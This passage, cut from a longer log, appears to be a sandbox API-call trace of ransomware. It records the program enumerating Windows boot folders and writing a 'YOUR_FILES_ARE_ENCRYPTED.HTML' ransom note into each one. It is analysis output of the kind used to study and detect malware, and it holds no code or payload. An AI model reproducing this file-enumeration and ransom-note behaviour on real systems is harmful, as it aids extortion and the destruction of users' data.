out: lpString1="\\\\?\\C:\\Boot\\Fonts") returned="\\\\?\\C:\\Boot\\Fonts" [0155.073] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\Fonts", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\*") returned="\\\\?\\C:\\Boot\\Fonts\\*" [0155.073] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Fonts\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec5544c0, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0xec5544c0, ftLastWriteTime.dwHighDateTime=0x1d70562, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.073] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec5544c0, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0xec5544c0, ftLastWriteTime.dwHighDateTime=0x1d70562, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.073] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec508200, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0x8de004dc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x60, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0155.073] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf") returned 30 [0155.073] lstrcmpW (lpString1="chs_boot.ttf", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.073] PathFindExtensionW (pszPath="chs_boot.ttf") returned=".ttf" [0155.073] lstrlenW (lpString=".ttf") returned 4 [0155.073] PathFindExtensionW (pszPath="chs_boot.ttf") returned=".ttf" [0155.073] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec52e360, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec52e360, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0x8dfef6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x0, dwReserved1=0x60, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0155.073] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf") returned 30 [0155.073] lstrcmpW (lpString1="cht_boot.ttf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.073] PathFindExtensionW (pszPath="cht_boot.ttf") returned=".ttf" [0155.073] lstrlenW (lpString=".ttf") returned 4 [0155.074] PathFindExtensionW (pszPath="cht_boot.ttf") returned=".ttf" [0155.074] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec52e360, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec52e360, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0x8e1201bc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x0, dwReserved1=0x60, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0155.074] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf") returned 30 [0155.074] lstrcmpW (lpString1="jpn_boot.ttf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.074] 
PathFindExtensionW (pszPath="jpn_boot.ttf") returned=".ttf" [0155.074] lstrlenW (lpString=".ttf") returned 4 [0155.074] PathFindExtensionW (pszPath="jpn_boot.ttf") returned=".ttf" [0155.074] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec5544c0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec5544c0, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0x8e30f39c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x0, dwReserved1=0x60, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0155.074] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf") returned 30 [0155.074] lstrcmpW (lpString1="kor_boot.ttf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.074] PathFindExtensionW (pszPath="kor_boot.ttf") returned=".ttf" [0155.074] lstrlenW (lpString=".ttf") returned 4 [0155.074] PathFindExtensionW (pszPath="kor_boot.ttf") returned=".ttf" [0155.074] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec5544c0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec5544c0, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0x8e3817bc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x60, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0155.074] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 31 [0155.074] lstrcmpW (lpString1="wgl4_boot.ttf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.074] PathFindExtensionW (pszPath="wgl4_boot.ttf") returned=".ttf" 
[0155.074] lstrlenW (lpString=".ttf") returned 4 [0155.074] PathFindExtensionW (pszPath="wgl4_boot.ttf") returned=".ttf" [0155.074] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec5544c0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec5544c0, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0x8e3817bc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x60, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0155.074] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.074] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.074] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\fonts\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.095] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.097] CloseHandle (hObject=0x4a4) returned 1 [0155.097] GetProcessHeap () returned 0x270000 [0155.098] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.098] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, 
ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0155.098] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR") returned 17 [0155.098] GetProcessHeap () returned 0x270000 [0155.098] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.098] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\fr-FR" | out: lpString1="\\\\?\\C:\\Boot\\fr-FR") returned="\\\\?\\C:\\Boot\\fr-FR" [0155.098] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\fr-FR", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\fr-FR\\*") returned="\\\\?\\C:\\Boot\\fr-FR\\*" [0155.098] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-FR\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.098] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.098] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, 
ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.098] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 33 [0155.098] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.098] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.098] lstrlenW (lpString=".mui") returned 4 [0155.098] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.099] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.099] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.099] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.099] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\fr-fr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.099] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, 
nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.101] CloseHandle (hObject=0x4a4) returned 1 [0155.105] GetProcessHeap () returned 0x270000 [0155.106] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.106] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0155.106] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU") returned 17 [0155.106] GetProcessHeap () returned 0x270000 [0155.106] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.106] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\hu-HU" | out: lpString1="\\\\?\\C:\\Boot\\hu-HU") returned="\\\\?\\C:\\Boot\\hu-HU" [0155.106] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\hu-HU", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\hu-HU\\*") returned="\\\\?\\C:\\Boot\\hu-HU\\*" [0155.106] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hu-HU\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) 
returned 0x42f3100 [0155.108] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.108] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.108] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 33 [0155.108] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.108] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.108] lstrlenW (lpString=".mui") returned 4 [0155.108] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.108] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.108] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.108] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.108] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\hu-hu\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.108] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.110] CloseHandle (hObject=0x4a4) returned 1 [0155.111] GetProcessHeap () returned 0x270000 [0155.112] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.112] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0155.112] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\it-IT") returned 17 [0155.112] GetProcessHeap () returned 0x270000 [0155.112] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.112] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\it-IT" | out: lpString1="\\\\?\\C:\\Boot\\it-IT") 
returned="\\\\?\\C:\\Boot\\it-IT" [0155.112] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\it-IT", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\it-IT\\*") returned="\\\\?\\C:\\Boot\\it-IT\\*" [0155.112] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\it-IT\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.112] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.112] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.112] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 33 [0155.112] lstrcmpW (lpString1="bootmgr.exe.mui", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.112] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.112] lstrlenW (lpString=".mui") returned 4 [0155.113] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.113] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.113] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.113] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.113] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\it-it\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.113] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.115] CloseHandle (hObject=0x4a4) returned 1 [0155.115] GetProcessHeap () returned 0x270000 [0155.117] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.117] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, 
ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fb1320, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fb1320, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0155.117] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP") returned 17 [0155.117] GetProcessHeap () returned 0x270000 [0155.117] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.117] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\ja-JP" | out: lpString1="\\\\?\\C:\\Boot\\ja-JP") returned="\\\\?\\C:\\Boot\\ja-JP" [0155.117] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\ja-JP", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\ja-JP\\*") returned="\\\\?\\C:\\Boot\\ja-JP\\*" [0155.117] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ja-JP\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fb1320, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fb1320, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.147] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fb1320, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fb1320, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.147] FindNextFileW (in: 
